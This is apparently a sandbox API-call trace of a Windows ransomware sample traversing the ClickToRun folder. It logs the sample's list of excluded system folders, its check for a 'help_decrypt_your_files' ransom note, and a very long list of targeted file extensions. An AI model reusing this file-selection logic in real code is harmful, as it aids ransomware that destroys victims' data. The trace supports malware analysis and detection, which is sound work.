	[0163.226] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd58489b0, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd584c46a, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0x7acd4881, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0163.226] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\*.*") returned 80
	[0163.226] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0163.226] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\*.*", cchLength=0x50 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*") returned 0x50
	[0163.226] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.227] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="windows") returned 0x0
	[0163.227] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.227] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="boot") returned 0x0
	[0163.227] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.227] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="system volume information") returned 0x0
	[0163.227] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.227] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0163.227] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.228] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="temp") returned 0x0
	[0163.228] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.228] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="program files") returned 0x0
	[0163.228] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.228] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="program files (x86)") returned 0x0
	[0163.228] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.229] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="appdata") returned 0x0
	[0163.229] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.229] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="application data") returned 0x0
	[0163.229] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.229] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="winnt") returned 0x0
	[0163.229] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.229] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="tmp") returned 0x0
	[0163.229] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.230] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="cache") returned 0x0
	[0163.230] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.230] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="temporary internet files") returned 0x0
	[0163.230] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.230] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="webcache") returned 0x0
	[0163.230] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.230] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="inetcache") returned 0x0
	[0163.230] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.231] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="nvidia") returned 0x0
	[0163.231] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.231] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="packages") returned 0x0
	[0163.231] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.231] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="cookies") returned 0x0
	[0163.231] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.231] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\*.*", lpSrch="programdata") returned 0x0
	[0163.232] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0163.232] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0163.232] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd58489b0, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd584c46a, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0x7acd4881, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0163.232] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0163.232] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5911742, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd5926364, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xd5926364, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-us.16", cAlternateFileName="")) returned 1
	[0163.232] lstrcmpW (lpString1="en-us.16", lpString2="..") returned 1
	[0163.232] lstrcmpW (lpString1="en-us.16", lpString2=".") returned 1
	[0163.232] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189"
	[0163.233] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\"
	[0163.233] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\", lpString2="en-us.16" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16"
	[0163.233] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16"
	[0163.233] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\"
	[0163.233] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\"
	[0163.233] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\*.*"
	[0163.233] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5911742, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd5926364, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xd5926364, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0163.240] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\*.*") returned 89
	[0163.240] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0163.240] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*") returned 0x59
	[0163.240] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.241] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="windows") returned 0x0
	[0163.241] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.241] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="boot") returned 0x0
	[0163.241] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.241] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="system volume information") returned 0x0
	[0163.241] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.242] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0163.242] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.242] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="temp") returned 0x0
	[0163.242] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.242] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="program files") returned 0x0
	[0163.242] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.242] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="program files (x86)") returned 0x0
	[0163.242] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.243] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="appdata") returned 0x0
	[0163.243] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.243] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="application data") returned 0x0
	[0163.243] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.243] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="winnt") returned 0x0
	[0163.243] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.243] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="tmp") returned 0x0
	[0163.244] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.244] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="cache") returned 0x0
	[0163.244] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.244] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="temporary internet files") returned 0x0
	[0163.244] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.244] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="webcache") returned 0x0
	[0163.244] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.244] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="inetcache") returned 0x0
	[0163.245] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.245] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="nvidia") returned 0x0
	[0163.245] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.245] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="packages") returned 0x0
	[0163.245] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.245] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="cookies") returned 0x0
	[0163.245] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.246] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="programdata") returned 0x0
	[0163.246] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5911742, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd5926364, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xd5926364, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="..", cAlternateFileName="")) returned 1
	[0163.246] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5916623, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd5916623, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0x22d02900, ftLastWriteTime.dwHighDateTime=0x1d0d7ee, nFileSizeHigh=0x0, nFileSizeLow=0x5765, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="MasterDescriptor.en-us.xml", cAlternateFileName="MASTER~1.XML")) returned 1
	[0163.246] lstrcmpW (lpString1="MasterDescriptor.en-us.xml", lpString2="..") returned 1
	[0163.246] lstrcmpW (lpString1="MasterDescriptor.en-us.xml", lpString2=".") returned 1
	[0163.246] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\"
	[0163.246] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\", lpString2="MasterDescriptor.en-us.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\MasterDescriptor.en-us.xml") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\MasterDescriptor.en-us.xml"
	[0163.247] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\MasterDescriptor.en-us.xml") returned 112
	[0163.247] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0163.247] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\MasterDescriptor.en-us.xml", cchLength=0x70 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\masterdescriptor.en-us.xml") returned 0x70
	[0163.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.247] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\masterdescriptor.en-us.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0163.247] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\masterdescriptor.en-us.xml" | out: lpString1="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\masterdescriptor.en-us.xml") returned="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\masterdescriptor.en-us.xml"
	[0163.247] lstrlenW (lpString="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\masterdescriptor.en-us.xml") returned 112
	[0163.247] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0163.248] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.248] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0163.248] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.248] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.